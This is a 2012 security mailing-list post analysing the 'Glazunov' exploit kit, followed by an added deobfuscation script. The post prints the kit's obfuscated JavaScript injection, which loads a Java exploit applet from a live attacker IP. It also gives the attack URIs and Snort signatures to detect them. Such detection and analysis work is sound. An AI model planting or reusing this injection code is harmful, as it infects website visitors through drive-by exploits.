[Emerging-Sigs] "Glazunov" injection update

Chris Wakelin c.d.wakelin at reading.ac.uk
Thu Nov 22 06:43:09 HAST 2012


I've just had a client compromised via Java from our old friend
"Glazunov" (my name, based on the hosting provider on which I originally
saw the exploit files - anybody with a better name please say!).

This is the kit that inserts malicious, randomly-obfuscated javascript
into web-pages (typically blogs) that points to one-time-only,
shortlived randomised URLs for a Java exploit and its payload.
Subsequent requests from the same IP do not see the injection (I'm
guessing it's using a rogue Wordpress plugin or Apache module).

The payload URI is literally encrypted using a key in the Java exploit
jar, using the same method as the kit I've been calling "Sibhost" (see
http://lists.emergingthreats.net/pipermail/emerging-sigs/2012-September/020384.html).

Previously, the Java exploit URI would be four random digits, and the
payload URI would be a different four digits plus "1" at the end.

Now, it appears to be five random digits for the payload, and ten random
digits "/" five random digits for the exploit, e.g.:

208.87.241.165 /4526020630/17108
208.87.241.165 /18012

208.87.241.165 /1680107170/66021
208.87.241.165 /12022

208.87.241.165 /6183807484/23919
208.87.241.165 /14892

The injected Javascript looks like (function and variable names and the
charcode displacement will vary as well as the encoded URIs):

> <body class="page-work"><body><script language="javascript"> var ws=new Date(); ws.setDate(12+ws.getDate()); document.cookie="stats=446501053769c06c565094b26d26e8ef; path=/; expires="+ ws.toGMTString(); gbt=4*1; nwf="lxxt>33"; </script><script language="javascript">var lktjt = function(gqnbwws){var jse = function(vni)
> {var kow, yaw, i; var qxt=""; kow = vni.length; for (i = 0; i < kow; ++i) {yaw = vni.charCodeAt(i)-gbt;qxt = qxt + String.fromCharCode(yaw);} return(qxt); }
> 
> var cqwhc=document.createElement(jse("ettpix"));cqwhc.setAttribute(jse("gshi"), jse("lujfl}pgf2r}yihov}qetpzkqnjz2gpeww"));cqwhc.setAttribute(jse("evglmzi"), " "+jse(nwf+"64<2<;268525:9><4<435:<454;5;43::465"));cqwhc.setAttribute(jse("{mhxl"), "1");cqwhc.setAttribute(jse("limklx"), "1");var xwdjbp=document.createElement(jse("teveq"));xwdjbp.setAttribute(jse("reqi"),jse("k{itpv"));xwdjbp.setAttribute(jse("zepyi"),jse("h=66hh4=75e67h8h<h6446h4;6e<g66=j6h77h9f9j4eh4h49h9h664h64f48h"));cqwhc.appendChild(xwdjbp);document.body.appendChild(cqwhc); } ;
> lktjt(1);</script></body>

Here's an update to the ET sig:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET CURRENT_EVENTS
probable malicious Glazunov Javascript injection";
flow:established,from_server; content:"(|22|"; content:"|22|))|3b|";
distance:64; within:68; content:")|3b|</script></body>"; within:200;
fast_pattern; flowbits:set,et.exploitkitlanding; classtype:bad-unknown;
sid:2014753; rev:3;)

and two more sigs to match the Java requests (I'm not 100% sure of the
performance, but I've been running versions of these to match the old
URIs for quite a while, albeit with no recent hits).

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS
Possible Glazunov Java exploit request /10-/5-digit";
flow:established,to_server; content:"|29 20|Java/"; http_header;
urilen:17; pcre:"/^\/\d{10}\/\d{5}$/U";
flowbits:set,et.exploitkitlanding; classtype:trojan-activity; sid:xxxx;
rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS
Possible Glazunov Java payload request /5-digit";
flow:established,to_server; content:"|29 20|Java/"; http_header;
urilen:6; pcre:"/^\/\d{5}$/U"; flowbits:set,et.exploitkitlanding;
classtype:trojan-activity; sid:xxxx; rev:1;)

Best Wishes,
Chris

-- 
--+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+-
Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 2908
Whiteknights, Reading, RG6 6AF, UK              Fax: +44 (0)118 975 3094
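As an added example (not part of the original post), here is a small analyst-side deobfuscator for the charcode-displacement scheme in the injected script quoted above: it recovers the displacement, decodes every encoded literal, and checks the recovered applet archive URL against the /10-digit/5-digit URI shape the two Snort rules key on. It assumes the variable names from the quoted sample (`gbt`, `nwf`, `jse`), which the post says vary between injections, so other samples may need those regexes adjusted.

```javascript
// Added example, not from the original post. The injected script builds each
// string by adding a constant (gbt) to every char code; jse() subtracts it, so
// the same subtraction recovers the cleartext for analysis.
function decodeShift(encoded, shift) {
  let out = "";
  for (let i = 0; i < encoded.length; i++) {
    out += String.fromCharCode(encoded.charCodeAt(i) - shift);
  }
  return out;
}

// Pull the displacement (gbt=N*1), the URL prefix (nwf) and every jse("...")
// literal out of a script body and decode them. The names "gbt", "nwf" and
// "jse" come from the quoted sample; they are an assumption for other samples.
function decodeInjection(script) {
  const gbtMatch = /gbt=(\d+)\*1/.exec(script);
  if (!gbtMatch) throw new Error("displacement (gbt) not found");
  const shift = parseInt(gbtMatch[1], 10);
  const prefix = /nwf="([^"]*)"/.exec(script);
  const nwf = prefix ? prefix[1] : "";
  const decoded = [];
  const lit = /jse\((?:nwf\+)?"([^"]*)"\)/g;
  let m;
  while ((m = lit.exec(script)) !== null) {
    const usesPrefix = m[0].startsWith("jse(nwf+");
    decoded.push(decodeShift((usesPrefix ? nwf : "") + m[1], shift));
  }
  return { shift, decoded };
}

// The exploit URI shape the Snort rules look for: /<10 digits>/<5 digits>.
const EXPLOIT_URI = /\/\d{10}\/\d{5}$/;

// Return only the decoded strings that look like the Java exploit request URI.
function findExploitUris(script) {
  return decodeInjection(script).decoded.filter((s) => EXPLOIT_URI.test(s));
}

// Constructed sample: a trimmed copy of the injected script quoted in the post.
const SAMPLE =
  'gbt=4*1; nwf="lxxt>33"; var cqwhc=document.createElement(jse("ettpix"));' +
  'cqwhc.setAttribute(jse("gshi"), jse("lujfl}pgf2r}yihov}qetpzkqnjz2gpeww"));' +
  'cqwhc.setAttribute(jse("evglmzi"), " "+jse(nwf+"64<2<;268525:9><4<435:<454;5;43::465"));';
```

Running `findExploitUris(SAMPLE)` yields the archive URL on 208.87.241.165, which matches the second example URI pair listed in the post.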